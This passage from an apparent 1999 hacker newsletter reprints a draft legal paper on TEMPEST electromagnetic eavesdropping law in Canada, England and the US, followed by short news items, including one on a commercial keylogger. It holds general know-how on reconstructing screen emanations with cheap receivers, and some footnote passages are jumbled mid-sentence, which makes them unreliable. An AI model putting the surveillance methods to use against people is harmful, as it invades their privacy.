doctors exchanging information over the Internet.
@HWA
14.0 Tempest Laws Reviewed
~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
Christopher J. Seline has released the draft of paper
that explains the legalities of eavesdropping on the
electromagnetic emanations of digital equipment
(TEMPEST). The paper covers the laws in Canada,
England and the United States. There is also
recommendations for any future laws and a complete
bibliography.
Cryptome
http://cryptome.org/tempest-law.htm
Date: Fri, 19 Jan 90 19:13:44 -0500
From: cjs%cwru@cwjcc.ins.cwru.edu (Christopher J. Seline (CJS@CWRU.CWRU.EDU))
The following is a prepublication draft of an article on TEMPEST. I am posting
it to this news group in the hope that it will:
(1) stimulate discussion of this issue;
(2) expose any technical errors in the document;
(3) solicit new sources of information;
(4) uncover anything I have forgotten to cover.
I will be unable to monitor the discussions of the article. Therefore, PLEASE
post your comments to the news group BUT SEND ME A COPY AT THE ADDRESS LISTED
BELOW.
I have gotten a number of mail messages about the format of this
article. Some explanation is in order: The numbered paragraphs
following "____________________" on each page are footnotes. I suggest
printing out the document rather than reading it on your CRT.
Thanks you in advance.
Christopher Seline
cjs@cwru.cwru.edu
cjs@cwru.bitnet
(c) 1990 Christopher J. Seline
=============================================================================
Eavesdropping On the Electromagnetic Emanations of Digital Equipment:
The Laws of Canada, England and the United States
Christopher J. Seline
This document is a rough draft. The Legal Sections are overviews. They
will be significantly expanded in the next version.
We in this country, in this generation, are -- by destiny rather than
choice -- the watchmen on the walls of freedom.[1] - President John
F. Kennedy
In the novel 1984, George Orwell foretold a future where individuals had
no expectation of privacy because the state monopolized the technology of
spying. The government watched the actions of its subjects from birth to
death. No one could protect himself because surveillance and
counter-surveillance technology was controlled by the government. This
note explores the legal status of a surveillance technology ruefully known
as TEMPEST.
Using TEMPEST technology the information in any digital device may be
intercepted and reconstructed into useful intelligence without the
operative ever having to come near his target. The technology is
especially useful in the interception of information stored in
digital computers or displayed on computer terminals.
The use of TEMPEST is not illegal under the laws of the United States, or
England. Canada has specific laws criminalizing TEMPEST eavesdropping but
the laws do more to hinder surveillance countermeasures than to prevent
TEMPEST surveillance.
In the United States it is illegal for an individual to take effective
countermeasures against TEMPEST surveillance. This leads to the conundrum
that it is legal for individuals and the government to invade the privacy
of others but illegal for individuals to take steps to protect their
privacy.
I. INTELLIGENCE GATHERING
Spying is divided by professionals into two main types: human intelligence
gathering (HUMINT) and electronic intelligence gathering (ELINT). As the
names imply, HUMINT relies on human operatives, and ELINT relies on
technological operatives. In the past HUMINT was the sole method for
collecting intelligence. The HUMINT operative would steal important
papers, observe troop and weapon movements, lure people into his
confidences to extract secrets, and stand under the eavesdrip of houses,
eavesdropping on the occupants.
As technology has progressed, tasks that once could only be performed by
humans have been taken over by machines. So it has been with spying.
Modern satellite technology allows troop and weapons movements to be
observed with greater precision and from greater distances than a human
spy could ever hope to accomplish.
The theft of documents and eavesdropping on conversations may now be
performed electronically. This means greater safety for the human
operative, whose only involvement may be the placing of the initial ELINT
devices. This has led to the ascendancy of ELINT over HUMINT because
the placement and monitoring of ELINT devices may be performed by a
technician who has no training in the art of spying. The gathered
intelligence may be processed by an intelligence expert, perhaps thousands
of miles away, with no need of field experience. ELINT has a number of
other advantages over HUMINT.
If a spy is caught his existence could embarrass his employing state and
he could be forced into giving up the identities of his compatriots or
other important information. By its very nature, a discovered ELINT device
(bug) cannot give up any information; and the ubiquitous nature of
bugs provides the principle state with the ability to plausibly deny
ownership or involvement.
ELINT devices fall into two broad categories: trespassatory and
non-trespassatory. Trespassatory bugs require some type of trespass in
order for them to function. A transmitter might require the physical
invasion of the target premises for placement, or a microphone might
be surreptitiously attached to the outside of a window.
A telephone transmitter can be placed anywhere on the phone line,
including at the central switch. The trespass comes either when it is
physically attached to the phone line, or if it is inductive, when placed
in close proximity to the phone line. Even microwave bugs require
the placement of the resonator cone within the target premises.
Non-trespassatory ELINT devices work by receiving electromagnetic
radiation (EMR) as it radiates through the ether, and do not require the
placement of bugs. Methods include intercepting information transmitted by
satellite, microwave, and radio, including mobile and cellular phone
transmissions. This information was purposely transmitted with the intent
that some intended person or persons would receive it.
Non-trespassatory ELINT also includes the interception of information that
was never intended to be transmitted. All electronic devices emit
electromagnetic radiation. Some of the radiation, as with radio waves, is
intended to transmit information. Much of this radiation is not
intended to transmit information and is merely incidental to whatever work
the target device is performing. This information can be intercepted and
reconstructed into a coherent form. With current TEMPEST technology it is
possible to reconstruct the contents of computer video display terminal
(VDU) screens from up to a kilometer distant; reconstructing the contents
of a computer's memory.
For a discussion of the TEMPEST ELINT threat See e.g., Memory Bank,
AMERICAN BANKER 20 (Apr 1 1985); Emissions from Bank Computer Systems Make
Eavesdropping Easy, Expert Says, AMERICAN BANKER 1 (Mar 26 1985); CRT
spying: a threat to corporate security, PC WEEK (Mar 10 1987).
By selectively firing the gun as it scans across the face of the CRT, the
pixels form characters on the CRT screen.
ELINT is not limited to governments. It is routinely used by individuals
for their own purposes. Almost all forms of ELINT are available to the
individual with either the technological expertise or the money to hire
someone with the expertise. Governments have attempted to
criminalize all use of ELINT by their subjects --to protect the privacy of
both the government and the population.
II. UNITED STATES LAW
In the United States, Title III of the Omnibus Streets and Crimes Act of
1968 criminalizes trespassatory ELINT as the intentional interception of
wire communications. As originally passed, Title III did not prohibit
non-trespassatory ELINT, because courts found that non-wire
communication lacked any expectation of privacy. The Electronic
Communications Privacy Act of 1986 amended Title III to include non-wire
communication.
ECPA was specifically designed to include electronic mail, inter computer
communications, and cellular telephones. To accomplish this, the
expectation of privacy test was eliminated. As amended, Title III still
outlaws the electronic interception of communications. The word
"communications" indicates that someone is attempting to communicate
something to someone; it does not refer to the inadvertent transmission of
information. The reception and reconstruction of emanated transient
electromagnetic pulses (ETEP), however, is based on obtaining information
that the target does not mean to transmit. If the ETEP is not intended as
communication, and is therefore not transmitted in a form approaching
current communications protocols, then it can not be
considered communications as contemplated by Congress when it amended
Title III. Reception, or interception, of emanated transient
electromagnetic pulses is not criminalized by Title III as amended.
III. ENGLISH LAW
In England the Interception of Communications Act 1985 criminalizes the
tapping of communications sent over public telecommunications lines.
The interception of communications on a telecommunication line can take
place with a physical tap on the line, or the passive interception of
microwave or satellite links. These forms of passive interception differ
from TEMPEST ELINT because they are intercepting intended
communication; TEMPEST ELINT intercepts unintended communication.
Eavesdropping on the emanations of computers does not in any way comport
to tapping a telecommunication line and therefore falls outside the scope
of the statute.
IV. CANADIAN LAW
Canada has taken direct steps to limit eavesdropping on computers.The
Canadian Criminal Amendment Act of 1985 criminalized indirect access to a
computer service. The specific reference to an "electromagnetic device"
clearly shows the intent of the legislature to include the use of
TEMPEST ELINT equipment within the ambit of the legislation.
The limitation of obtaining "any computer service" does lead to some
confusion.
The Canadian legislature has not made it clear whether "computer service"
refers to a computer service bureau or merely the services of a computer.
If the Canadians had meant access to any computer, why did they refer to
any "computer service". This is especially confusing considering the
all-encompassing language of (b) 'any function of a computer system'.
Even if the Canadian legislation criminalizes eavesdropping on all
computers, it does not solve the problem of protecting the privacy of
information. The purpose of criminal law is to control crime.
Merely making TEMPEST ELINT illegal will not control its use. First,
because it is an inherently passive crime it is impossible to detect and
hence punish. Second, making this form of eavesdropping illegal without
taking a proactive stance in controlling compromising emanations
gives the public a false sense of security. Third, criminalizing the
possession of a TEMPEST ELINT device prevents public sector research into
countermeasures. Finally, the law will not prevent eavesdropping on
private information held in company computers unless disincentives are
given for companies that do not take sufficient precautions against
eavesdropping and simple, more common, information crimes.
V. SOLUTIONS
TEMPEST ELINT is passive. The computer or terminal emanates compromising
radiation which is intercepted by the TEMPEST device and reconstructed
into useful information. Unlike conventional ELINT there is no need to
physically trespass or even come near the target. Eavesdropping can
be performed from a nearby office or even a van parked within a reasonable
distance.
This means that there is no classic scene of the crime; and little or no
chance of the criminal being discovered in the act. If the crime is
discovered it will be ancillary to some other investigation. For example,
if an individual is investigated for insider trading a search of his
residence may yield a TEMPEST ELINT device.
The device would explain how the defendant was obtaining insider
information; but it was the insider trading, not the device, that gave
away the crime. This is especially true for illegal TEMPEST ELINT
performed by the state.
Unless the perpetrators are caught in the act there is little evidence of
their spying. A trespassatory bug can be detected and located; further,
once found it provides tangible evidence that a crime took place. A
TEMPEST ELINT device by its inherent passive nature leaves nothing
to detect. Since the government is less likely to commit an ancillary
crime which might be detected there is a very small chance that the spying
will ever be discovered.
The only way to prevent eavesdropping is to encourage the use of
countermeasures TEMPEST Certified computers and terminals. In merely
making TEMPEST ELINT illegal the public is given the false impression of
security; they are lulled into believing the problem has been
solved.
Making certain actions illegal does not prevent them from occurring. This
is especially true for a TEMPEST ELINT because it is undetectable.
Punishment is an empty threat if there is no chance of being detected;
without detection there can be no apprehension and conviction.
The only way to prevent some entity from eavesdropping on one's computer
or computer terminal is for the equipment not to give off compromising
emanation; it must be TEMPEST Certified. The United States can solve this
problem by taking a proactive stance on compromising emanations. The
National Institute of Standards and Technology (NIST) is in charge of
setting forth standards of computer security for the private sector.
NIST is also charged with doing basic research to advance the art of
computer security. Currently NIST does not discuss TEMPEST with the
private sector. For privacy's sake, this policy must be changed to a
proactive one. The NIST should publicize the TEMPEST ELINT threat
to computer security and should set up a rating system for level of
emanations produced by computer equipment. Further, legislation should be
enacted to require the labeling of all computer equipment with its level
of emanations and whether it is TEMPEST Certified. Only if the public
knows of the problem can it begin to take steps to solve it.
Title III makes possession of a surveillance device a crime, unless it is
produced under contract to the government. This means that research into
surveillance and counter-surveillance equipment is monopolized by the
government and a few companies working under contract with NACSIM
5100A is classified, as are all details of TEMPEST. To obtain access to
it, contractor must prove that there is demand within the government for
the specific type of equipment that intend to certify. Since the standard
is classified, the contractors can not sell the equipment to non-secure
governmental agencies or the public. This prevents reverse engineering of
the standard for its physical embodiment, the Certified equipment. By
preventing the private sector from owning this anti-eavesdropping
equipment, the NSA has effectively prevented the them from protecting the
information in their computers.
If TEMPEST eavesdropping is criminalized, then possession of TEMPEST ELINT
equipment will be criminal. Unfortunately,this does not solve the problem.
Simple TEMPEST ELINT equipment is easy to make. For just a few dollars
many older television sets can be modified to receive and
reconstruct EMR. For less than a hundred dollars a more sophisticated
TEMPEST ELINT receiver can be produced. The problem with criminalizing
the possession of TEMPEST ELINT equipment is not just that the law will
have little effect on the use of such equipment, but that it will have a
negative effect on countermeasures research. To successfully design
countermeasures to a particular surveillance technique it is vital to have
a complete empirical understanding of how that technique works. Without
the right to legally manufacture a surveillance device there is no
possible way for a researcher to have the knowledge to produce an
effective countermeasures device. It is axiomatic: without a surveillance
device, it is impossible to test a countermeasures device.
A number of companies produce devices to measure the emanations from
electrical equipment. Some of these devices are specifically designed for
bench marking TEMPEST Certified equipment. This does not solve the
problem. The question arises: how much radiation at a particular
frequency is compromising? The current answer is to refer to NACSIM 5100A.
This document specifies the emanations levels suitable for Certification.
The document is only available to United States contractors having
sufficient security clearance and an ongoing contract to produce TEMPEST
Certified computers for the government. Further, the correct levels
are specified by the NSA and there is no assurance that, while these
levels are sufficient to prevent eavesdropping by unfriendly operatives,
equipment certified under NACSIM 5100A will have levels low enough to
prevent eavesdropping by the NSA itself.
The accessibility of supposedly correct emanations levels does not solve
the problem of preventing TEMPEST eavesdropping. Access to NACSIM 5100A
limits the manufacturer to selling the equipment only to United States
governmental agencies with the need to process secret information.
Without the right to possess TEMPEST ELINT equipment manufacturers who
wish to sell to the public sector cannot determine what a safe level of
emanations is. Further those manufacturers with access to NACSIM 5100A
should want to verify that the levels set out in the document are, in
fact, low enough to prevent interception.
Without an actual eavesdropping device with which to test, no manufacturer
will be able to produce genuinely uncompromising equipment.
Even if the laws allow ownership of TEMPEST Certified equipment by the
public, and even if the public is informed of TEMPEST's threat to privacy,
individuals' private information will not necessarily by protected.
Individuals may choose to protect their own
information on their own computers. Companies may choose whether to
protect their own private information. But companies that hold the
private information of individuals must be forced to take steps to protect
that information.
In England the Data Protection Act 1984 imposes sanctions against anyone
who stores the personal information on a computer and fails to take
reasonable measures to prevent disclosure of that information. The act
mandates that personal data may not be stored in any computer unless
the computer bureau or data user has registered under the act. This
provides for a central registry and the tracking of which companies or
persons maintain databases of personal information. Data users and bureaus
must demonstrate a need and purpose behind their possession of personal
data.
The act provides tort remedies to any person who is damaged by disclosure
of the personal data. Reasonable care to prevent the disclosure is a
defense. English courts have not yet ruled what level of computer
security measures constitute reasonable care. Considering the
magnitude of invasion possible with TEMPEST ELINT it should be clear by
now that failure to use TEMPEST Certified equipment is prima facie
unreasonable care.
The Remedies section of the act provides incentive for these entities to
provide successful protection of person data from disclosure or illicit
access. Failure to protect the data will result in monetary loss. This
may be looked at from the economic efficiency viewpoint as
allocating the cost of disclosure the persons most able to bear those
costs, and also most able to prevent disclosure. Data users that store
personal data would use TEMPEST Certified equipment as part of their
computer security plan, thwarting would-be eavesdroppers. The Data
Protection Act 1984 allocates risk to those who can bear it best and
provides an incentive for them to keep other individuals' data private.
This act should be adopted by the United States as part of a full-spectrum
plan to combat TEMPEST eavesdropping.
Data users are in the best position to prevent disclosure through proper
computer security. Only by making them liable for failures in security can
we begin to rein in TEMPEST ELINT.
VII Recommendations
Do not criminalize TEMPEST ELINT. Most crimes that TEMPEST ELINT would
aid, such a insider trading, are already illegal; the current laws are
adequate. The National Institute of Standards and Technology should
immediately begin a program to educate the private sector about
TEMPEST. Only if individuals are aware of the threat can they take
appropriate precautions or decide whether any precautions are necessary.
Legislation should be enacted to require all electronic equipment to
prominently display its level of emanations and whether it is TEMPEST
Certified. If individuals are to choose to protect themselves they must be
able to make a informed decision regarding how much protection is
enough.
TEMPEST Certified equipment should be available to the private sector.
The current ban on selling to non-governmental agencies prevents
individuals who need to protect information from having the technology to
do so.
Possession of TEMPEST ELINT equipment should not be made illegal. The
inherently passive nature and simple design of TEMPEST ELINT equipment
means that making its possession illegal will not deter crime; the units
can be easily manufactured and are impossible to detect. Limiting
their availability serves only to monopolize the countermeasures research,
information, and equipment for the government; this prevents the testing,
design and manufacture of countermeasures by the private sector.
Legislation mirroring England's Data Protection Act 1984 should be
enacted. Preventing disclosure of personal data can only be accomplished
by giving those companies holding the data a reason to protect it. If data
users are held liable for their failure to take reasonable security
precautions they will begin to take reasonable security precautions,
including the use of TEMPEST Certified equipment.
References:
1. Undelivered speech of President John F. Kennedy, Dallas Citizens
Council (Nov. 22, 1963) 35-36.
2. TEMPEST is an acronym for Transient Electromagnetic Pulse Emanation
Standard.
This standard sets forth the official views of the United States on the
amount of electromagnetic radiation that a device may emit without
compromising the information it is processing. TEMPEST is a defensive
standard; a device which conforms to this standard is referred to as
TEMPEST Certified.
The United States government has refused to declassify the acronym for
devices used to intercept the electromagnetic information of non-TEMPEST
Certified devices. For this note, these devices and the technology behind
them will also be referred to as TEMPEST; in which case, TEMPEST stands
for Transient Electromagnetic Pulse Surveillance Technology.
The United States government refuses to release details regarding TEMPEST
and continues an organized effort to censor the dissemination of
information about it. For example the NSA succeeded in shutting down a
Wang Laboratories presentation on TEMPEST Certified equipment by
classifying the contents of the speech and threatening to prosecute the
speaker with revealing classified information.
The pixels glow for only a very short time and must be routinely struck by
the electron beam to stay lit. To maintain the light output of all the
pixels that are supposed to be lit, the electron beam traverses the entire
CRT screen sixty times a second. Every time the beam fires it causes
a high voltage EMR emission. This EMR can be used to reconstruct the
contents of the target CRT screen. TEMPEST ELINT equipment designed to
reconstruct the information synchronizes its CRT with the target CRT.
First, it uses the EMR to synchronize its electron gun with the electron
gun in the target CRT. Then, when the TEMPEST ELINT unit detects EMR
indicating that the target CRT fired on a pixel, the TEMPEST ELINT unit
fires the electron gun of its CRT. The ELINT CRT is in perfect synchronism
with the target CRT; when the target lights a pixel, a corresponding pixel
on the TEMPEST ELINT CRT is lit. The exact picture on the target CRT will
appear on the TEMPEST ELINT CRT. Any changes on the target screen will be
instantly reflected in the TEMPEST ELINT screen. TEMPEST Certified
equipment gives off emissions levels that are too faint to be readily
detected. Certification levels are set out in National Communications
Security Information Memorandum 5100A (NACSIM 5100A). "Emission levels are
expressed in the time and frequency domain, broadband or narrow band in
terms of the frequency domain, and in terms of conducted or radiated
emissions." White, supra, note 9, 10.1.
For a thorough though purposely misleading discussion of TEMPEST ELINT see
Van Eck, Electromagnetic Radiation from Video Display units: An
Eavesdropping Risk?, 4 Computers & Security 269 (1985). [See:
http://jya.com/emr.pdf ]
3. This Note will not discuss how TEMPEST relates to the Warrant
Requirement under the United States Constitution. Nor will it discuss the
Constitutional exclusion of foreign nationals from the Warrant
Requirement. Protecting privacy under TEMPEST should be made freely
available; TEMPEST Certified equipment should be legally available; and
organizations possessing private information should be required by law to
protect that information through good computer security practices and the
use of TEMPEST Certified equipment.
4. HUMINT has been used by the United States since the Revolution. "The
necessity of procuring good intelligence is apparent & need not be further
urged -- All that remains for me to add is, that you keep the whole matter
as secret as possible. For upon Secrecy, Success depends in Most
Enterprises of the kind, and for want of it, they are generally defeated,
however well planned & promising a favorable issue." Letter of George
Washington (Jul. 26, 1777).
5. "... I wish you to take every possible pains in your powers, by sending
trusty persons to Staten Island in whom you can confide, to obtain
Intelligence of the Enemy's situation & numbers -- what kind of Troops
they are, and what Guards they have -- their strength & where
posted." Id.
6. Eavesdrip is an Anglo-Saxon word, and refers to the wide overhanging
eaves used to prevent rain from falling close to a house's foundation.
The eavesdrip provided "a sheltered place where one could hide to listen
clandestinely to conversation within the house." W. MORRIS & M.
MORRIS, MORRIS DICTIONARY OF WORD AND PHRASE ORIGINS, (1977).
7. Pursglove, How Russian Spy Radios Work, RADIO ELECTRONICS, 89-91 (Jan
1962).
8. Interception is an espionage term of art and should be differentiated
from its more common usage. When information is intercepted, the
interceptor as well as the intended recipient receive the information.
Interception when not used as a term of art refers to one person
receiving something intended for someone else; the intended recipient
never receives what he was intended to receive.
9. There are two types of emissions, conducted and radiated. Radiated
emissions are formed when components or cables act as antennas for
transmitting the EMR; when radiation is conducted along cables or other
connections but not radiated it is referred to as "conducted".
Sources include cables, the ground loop, printed circuit boards, internal
wires, the power supply to power line coupling, the cable to cable
coupling, switching transistors, and high-power amplifiers. WHITE & M.
MARDIGUIAN, EMI CONTROL METHODOLOGY AND PROCEDURES, 10.1 (1985). "[C]ables
may act as an antenna to transmit the signals directly or even both
receive the signals and re-emit them further away from the source
equipment. It is possible that cables acting as an antenna in such a
manner could transmit the signals much more efficiently than the equipment
itself...A similar effect may occur with metal pipes such as those for
domestic water supplies. ... If an earthing [(grounding)] system is not
installed correctly such that there is a path in the circuit with a very
high resistance (for example where paint prevents conduction and is acting
as an insulator), then the whole earthing system could well act in a
similar fashion to an antenna. ... [For a VDU] the strongest signals, or
harmonics thereof, are usually between 60-250 MHz approximately.
There have however been noticeable exception of extremely strong emissions
in the television bands and at higher frequencies between 450-800 MHz.
Potts, Emission Security, 3 COMPUTER LAW AND SECURITY REPORT 27 (1988).
10. The TEMPEST ELINT operator can distinguish between different VDUs in
the same room because of the different EMR characteristics of both homo
and heterogeneous units. "There is little comparison between EMR
characteristics from otherwise comparable equipment. Only if the VDU was
made with exactly the same components is there any similarity. If some of
the components have come from a different batch, have been updated in some
way, and especially if they are from a different manufacturer, then
completely different results are obtained. In this way a different mark or
version of the same [VDU] will emit different signals. Additionally
because of the variation of manufacturing standards between counties, two
VDUs made by the same company but sourced from different counties will
have entirely different EMR signal characteristics...From this it way be
thought that there is such a jumble of emissions around, that it would not
be possible to isolate those from any one particular source. Again, this
is not the case.
Most received signals have memory or the contents of its mass storage
devices is more complicated and must be performed from a closer distance.
The reconstruction of information via EMR, a process for which the United
States government refuses to declassify either the exact technique
or even its name, is not limited to computers and digital devices but is
applicable to all devices that generate electromagnetic radiation. TEMPEST
is especially effective against VDUs because they produce a very high
level of EMR, a different line synchronization, due to design, reflection,
interference or variation of component tolerances. So that if for instance
there are three different signals on the same frequency ... by fine tuning
of the RF receiver, antenna manipulation and modification of line
synchronization, it is possible to lock onto each of the three signals
separately and so read the screen information. By similar techniques, it
is entirely possible to discriminate between individual items of equipment
in the same room." Potts, supra note 9.
11. TEMPEST is concerned with the transient electromagnetic pulses formed
by digital equipment. All electronic equipment radiates EMR which may be
reconstructed. Digital equipment processes information as 1's and 0's --
on's or off's. Because of this, digital equipment gives off pulses
of EMR. These pulses are easier to reconstruct at a distance than the
non-pulse EMR given off by analog equipment. For a thorough discussion the
radiation problems of broadband digital information see e.g. military
standard MIL-STD-461 REO2; White supra note 9, 10.2.
12. See supra note 2.
13. Of special interest to ELINT collectors are EMR from computers,
communications centers and avionics. Schultz, Defeating Ivan with TEMPEST,
DEFENSE ELECTRONICS 64 (June 1983).
14. The picture on a CRT screen is built up of picture elements (pixels)
organized in lines across the screen. The pixels are made of material that
fluoresces when struck with energy. The energy is produced by a beam of
electrons fired from an electron gun in the back of the picture
tube. The electron beam scans the screen of the CRT in a regular
repetitive manner. When the voltage of the beam is high then the pixel it
is focused upon emits photons and appears as a dot on the screen.
15. Pub. L. No. 90-351, 82 Stat. 197. The Act criminalizes trespassatory
ELINT by individuals as well as governmental agents. cf. Katz v. United
States, 389 U.S. 347 (1967) (Fourth Amendment prohibits surveillance by
government not individuals.)
16. 18 U.S.C. 2511(1)(a).
17. United States v. Hall, 488 F.2d 193 (9th Cir. 1973) (found no
legislative history indicating Congress intended the act to include
radio-telephone conversations). Further, Title III only criminalized the
interception of "aural" communications which excluded all forms of
computer communications.
18. Willamette Subscription Television v. Cawood, 580 F.Supp 1164 (D. Or.
1984) (non-wire communications lacks any expectation of privacy).
19. Pub. L. No. 99-508, 100 Stat. 1848 (codified at 18 U.S.C. 2510-710)
[hereinafter ECPA].
20. 18 U.S.C. 2511(1)(a) criminalizes the interception of "any wire, oral
or electronic communication" without regard to an expectation of privacy.
21. Interception of Communications Act 1985, Long Title, An Act to make
new provision for and in connection with the interception of
communications sent by post or by means of public telecommunications
systems and to amend section 45 of the Telecommunications Act 1984.
22. Interception of Communications Act 1985 1, Prohibition on
Interception: (1) Subject to the following provisions of this section, a
person who intentionally intercepts a communication in the course of its
transmission by post or by means of a public telecommunications
system shall be guilty of an offence and liable-- (a) on summary
conviction, to a fine not exceeding the statutory maximum; (b) on
conviction on indictment, to imprisonment for a term not exceeding two
years or to a fine or to both. ***
23. Tapping (aka trespassatory eavesdropping) is patently in violation of
the statute. "The offense created by section 1 of the Interception of
Communications Act 1985 covers those forms of eavesdropping on computer
communications which involve "tapping" the wires along which
messages are being passed. One problem which may arise, however, is the
question of whether the communication in question was intercepted in the
course of its transmission by means of a public telecommunications system.
It is technically possible to intercept a communication at several stages
in its transmission, and it may be a question of fact to decide the stage
at which it enters the "public" realm. THE LAW COMMISSION,WORKING PAPER
NO. 110: COMPUTER MISUSE, 3.30 (1988).
24. "There are also forms of eavesdropping which the Act does not cover.
For example. eavesdropping on a V.D.U. [referred to in this text as a CRT]
screen by monitoring the radiation field which surrounds it in order to
display whatever appears on the legitimate user's screen on the
eavesdropper's screen. This activity would not seem to constitute any
criminal offence..." THE LAW COMMISSION, WORKING PAPER NO. 110: COMPUTER
MISUSE, 3.31 (1988).
25. 301.2(1) of the Canadian criminal code states that anyone who: ...
without color of right, (a) obtains, directly or indirectly, any computer
service, (b) by means of an electromagnetic ... or other device,
intercepts or causes to be intercepted, either directly or
indirectly, any function of a computer system ... [is guilty of an
indictable offence].
26. UNITED STATES SENTENCING COMM'N, FEDERAL SENTENCING GUIDELINES MANUAL
(1988) (Principles Governing the Redrafting of the Preliminary Guidelines
"g." (at an unknown page))
27. There has been great debate over what exactly is a computer crime.
There are several schools of thought. The more articulate school, and the
one to which the author adheres holds that the category computer crime
should be limited to crimes directed against computers; for example,
a terrorist destroying a computer with explosives would fall into this
category. Crimes such as putting ghost employees on a payroll computer and
collecting their pay are merely age-old accounting frauds; today the fraud
involves a computer because the records are kept on a computer. The
computer is merely ancillary to the crime. This has been mislabeled
computer crime and should merely be referred to as a fraud perpetrated
with the aid of a computer.
Finally, there are information crimes. These are crimes related to the
purloining or alteration of information. These crimes are more common and
more profitable due to the computer's ability to hold and access great
amounts of information. TEMPEST ELINT can best be categorized as a
information crime.
28. Compare, for example, the Watergate break-in in which the burglars
were discovered when they returned to move a poorly placed spread spectrum
bug.
29. TEMPEST Certified refers to the equipment having passed a testing and
emanations regime specified in NACSIM 5100A. This classified document sets
forth the emanations levels that the NSA believes digital equipment can
give off without compromising the information it is processing.
TEMPEST Certified equipment is theoretically secure against TEMPEST
eavesdropping.
30. Previously the Bureau of Standards. The NIST is a division of the
Commerce Department.
31. In this case computer equipment would include all peripheral computer
equipment. There is no use is using a TEMPEST Certified computer if the
printer or the modem are not Certified.
32. The NSA has tried to limit the availability of TEMPEST information to
prevent the spread of the devices. For a discussion of the First Amendment
and prior restraint See, e.g. The United States of America v. Progressive,
Inc. 467 F.Supp 990 (1979, WD Wis.) (magazine intended to publish
plans for nuclear weapon; prior restraint injunction issued), reh. den.
United States v. Progressive Inc. 486 F.Supp 5 (1979, WD Wis.), motion
den.; Morland v. Sprecher 443 US 709 (1979) (mandamus), motion denied;
United States v. Progressive, Inc. 5 Media L R (1979, 7th Cir.), dismd.
without op.; U.S. v. Progressive, Inc 610 F.2d 819 (1979, 7th Cir.); New
York Times, Co. v. United States, 403 U.S. 713 (1971) (per curium)
(Pentagon Papers case: setting forth prior restraint standard which
government was unable to meet); T. EMERSON, THE SYSTEM OF FREEDOM OF
EXPRESSION (1970); Balance Between Scientific Freedom and National
Security, 23 JURIMETRICS J. 1 (1982) (current laws and regulations
limiting scientific and technical expression exceed the legitimate needs
of national security); Hon. M. Feldman, Why the First Amendment is not
Incompatible with National Security, HERITAGE FOUNDATION
REPORTS (Jan. 14,
1987). Compare Bork, Neutral Principles and Some First Amendment Problems,
47 IND. L. J. 1 (First Amendment applies only to political speech); G.
Lewy, Can Democracy Keep Secrets, 26 POLICY REVIEW 17 (1983)(endorsing
draconian secrecy laws mirroring the English system).
33. For example, the NSA has just recently allowed the Drug Enforcement
Agency (DEA) to purchase TEMPEST Certified computer equipment. The DEA
wanted secure computer equipment because wealthy drug lords had were using
TEMPEST eavesdropping equipment.
34. An Act to regulate the use of automatically processed information
relating to individuals and the provision of services in respect of such
information. - Data Protection Act 1984, Long Title.
35. "Personal data" means data consisting of information which relates to
a living individual who can be identified from that
36. "Data user" means a person who holds data, and a persons "Holds" data
if -- (a) the data form part of a collection of data processed or intended
to be processed by or on behalf of that person as mentioned in subsection
(2) above; [subsection (2) defines "data"] and (b) that person
(either alone or jointly or in common with other persons) controls the
contents and use of the data comprised in the collection; and (c) the data
are in the form in which they have been or are intended to be processed as
mentioned in paragraph (a) above or (though not for the time being in that
form) in a form into which they have been converted after being so
processed and with a view to being further so processed on a subsequent
occasion. - Data Protection Act 1(5).
37. Data Protection Act 1984, 4,5.
38. An individual who is the subject of personal data held by a data
user... and who suffers damage by reason of (1)(c) ... the disclosure of
the data, or access having been obtained to the data without such
authority as aforesaid shall be entitled to compensation from the
data user... for any distress which the individual has suffered by reason
of the ... disclosure or access. - Data Protection Act 1984 23.
39. ... it shall be a defense to prove that ... the data user ... had taken
such care as in all the circumstances was reasonably required to prevent
the... disclosure or access in question. - Data Protection Act 1984 23(3).
@HWA
15.0 Russians Seize Nuclear Expert's Computer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by EvilWench
The computer of Joshua Handler, a Princeton University
specialist in nuclear radiation and security has had his
computer and documents seized by the Russian Secret
Service (FSB).
Russia Today
http://www.russiatoday.com/news.php3?id=105308
FSB Seizes Computer, Notes, From
U.S. Nuclear Expert
MOSCOW, Oct 29, 1999 -- (Agence France
Presse) Russia's secret service seized a computer and
documents from the Moscow apartment of a US
nuclear security expert, the Interfax news agency
reported Thursday, citing a Russian colleague.
The FSB, successor to the KGB, seized the
computer, research documents, manuscripts and
notes from the apartment of Joshua Handler, a
Princeton University specialist in nuclear radiation and
security, the colleague, Alexei Yablokov, told
Interfax.
The seizure took place on Wednesday, he said. ((c) 1999 Agence France Presse)
@HWA
16.0 Sir Dystic and Kevin Poulsen to Speak
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by s_d
Sir Dystic, creator of the original Back Orifice, and Kevin
Poulsen, currently a columnist for ZD Net, will be
speaking at the 16th World Conference on Computer
Security and Control on November 3 1999. The
conference will be held in London England.
Compsec International 99
http://www.elsevier.nl:80/homepage/sag/compsec99/menu2.htm
@HWA
17.0 Invisible KeyLogger97
~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Weld Pond
C|Net has listed what it calls the top 10 technology
products that will "scare you to death"! Number 8 on
that list is Invisible KeyLogger 97 designed to capture
every keystroke including passwords. (This is yet
another commercial Back Orifice like product. Why are
the Anti-Virus companies refusing to release definitions
for these?)
C|Net
http://www.cnet.com/Content/Gadgets/Guides/Terrors/ss03.html
KeyLogger
http://www.keylogger.com/
Invisible KeyLogger 97
Trick: Logs every keystroke in Windows.
Treat: Your enemy has a record of every email message and document you type.
If you have to leave your computer unattended and want to make sure that
no one tampers with it, install Invisible KeyLogger 97 (IK97). It silently
grabs every Windows keystroke and adds it to a log file, essentially
recording everything that happens while you're away. You can also use IK97
to monitor your children's PC use and to provide backup copies of
everything that you type.
This is a great tool, but what if someone else were to secretly install
IK97 on your PC and monitor you? If you share a workstation, or if someone
gets to your system when it's unattended, IK97 can be used to steal your
passwords and record your private email and documents. Remember that
message you sent about your boss's ugly hairdo? You deleted it from your
out-box, but IK97 still has a copy of it.
To find out if IK97 is running on your system, hit Ctrl-Alt-Delete. If you
see a program called ik in the Close Program dialog box, that's Invisible
KeyLogger 97, and you can stop it by selecting End Task. Unfortunately,
however, IK97 has a sibling called Invisible KeyLogger Stealth (IKS) that
